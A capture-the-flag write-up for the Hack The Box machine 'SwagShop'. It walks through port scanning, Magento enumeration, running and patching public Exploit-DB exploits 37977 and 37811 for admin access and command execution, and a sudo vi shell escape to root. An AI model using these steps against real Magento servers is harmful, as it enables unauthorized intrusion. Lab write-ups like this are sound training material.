SwagShop
Reconnaissance
First thing we want to do is run rustscan and see what services are available
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
😵 https://admin.tryhackme.com
[~] The config file is expected to be at "/root/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.129.204.24:22
Open 10.129.204.24:80
[~] Starting Script(s)
[~] Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-06 19:41 EDT
Initiating Ping Scan at 19:41
Scanning 10.129.204.24 [4 ports]
Completed Ping Scan at 19:41, 0.06s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:41
Completed Parallel DNS resolution of 1 host. at 19:41, 0.00s elapsed
DNS resolution of 1 IPs took 0.00s. Mode: Async [#: 5, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 19:41
Scanning 10.129.204.24 [2 ports]
Discovered open port 80/tcp on 10.129.204.24
Discovered open port 22/tcp on 10.129.204.24
Completed SYN Stealth Scan at 19:41, 0.07s elapsed (2 total ports)
Nmap scan report for 10.129.204.24
Host is up, received echo-reply ttl 63 (0.034s latency).
Scanned at 2022-07-06 19:41:46 EDT for 0s
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.26 seconds
Raw packets sent: 6 (240B) | Rcvd: 3 (116B)Port 80 is open and viewing the site we see this
After adding swagshop.htb to my /etc/hosts file we see this
Enumeration
The site is running Magento, which is an open-source e-commerce platform written in PHP.
It looks like there is not an easy way too enumerate users
The copyright at the bottom of the page says 2014 so this has not been updated in a while. We can use something called magescan to get some information
Running php magescan.phar scan:all swagshop.htb > output.scan we get (truncated).
Scanning http://swagshop.htb/...
Magento Information
+-----------+------------------+
| Parameter | Value |
+-----------+------------------+
| Edition | Community |
| Version | 1.9.0.0, 1.9.0.1 |
+-----------+------------------+
Installed Modules
No detectable modules were found
Sitemap
Sitemap is not declared in robots.txt
Sitemap is not accessible: http://swagshop.htb/sitemap.xml
Server Technology
+--------+------------------------+
| Key | Value |
+--------+------------------------+
| Server | Apache/2.4.18 (Ubuntu) |
+--------+------------------------+
Unreachable Path Check
+----------------------------------------------+---------------+--------+
| Path | Response Code | Status |
+----------------------------------------------+---------------+--------+
| app/etc/local.xml | 200 | Fail |
| index.php/rss/order/NEW/new | 200 | Fail |
| shell/ | 200 | Fail |
+----------------------------------------------+---------------+--------+Doing a quick searchsploit for magento we get
The authenticated one looks good but none of the combos I tried worked so I am going to skip that
Exploit 37977 looks interesting though, we can see it here: https://www.exploit-db.com/exploits/37977
Exploitation
For the exploit script I added the target
After running it we have a bit of a problem
Looking in the script it is trying to go to target + /admin/Cms_Wysiwyg/directive/index/
Looking at the site we cant hit that
Looking at the working site it has index.php in the url so trying that it looks like it works
After making a slight change to the script things look to be working
We got the admin panel!!!
Initial Access
Now that we are authenticated lets try that other exploit found here: https://www.exploit-db.com/exploits/37811
Modifying the config to the correct install date and the credentials we got from the exploit
We get a “mechanize._form_controls.ControlNotFoundError”.
After searching google I found this on stackoverflow: https://stackoverflow.com/questions/35226169/clientform-ambiguityerror-more-than-one-control-matching-name
We need to make a slight code change
## Comment out this code found in the script
#br.form.new_control('text', 'login[username]', {'value': username})
#br.form.fixup()
#br['login[username]'] = username
#br['login[password]'] = password
## Add this code in place of what is above
userone = br.find_control(name="login[username]", nr=0)
userone.value = username
pwone = br.find_control(name="login[password]", nr=0)
pwone.value = passwordRunning python2 37811.py http://10.129.204.24/index.php/admin/ "whoami" we get another issue
We also need to follow redirects it looks like
There was also another issue that I found because the machine was old and not patched recently but you have to create a shipment and make sure it is in the processing state. I found a note on the forum here: https://forum.hackthebox.com/t/swagshop/1539/1229
Now running the exploit we get output!
Time to get a shell back
Here we can find user.txt
Note: I have hidden part of the flag
Privilege Escalation
Running sudo -l we see something interesting
We are allowed to run sudo on any files in /var/www/html/
Running this gets us root!
sudo vi /var/www/html/bla -c ':!/bin/sh'Note: I have hidden part of the flag
Lessons Learned
Make sure to check for information disclosure. The
/app/etc/local.xmlfile was exposed to everyone!Always read the scripts and understand what they are doing. I got held up the longest because there were no shipments in the last 2 years so I had to create one in the admin panel to get the exploit to work.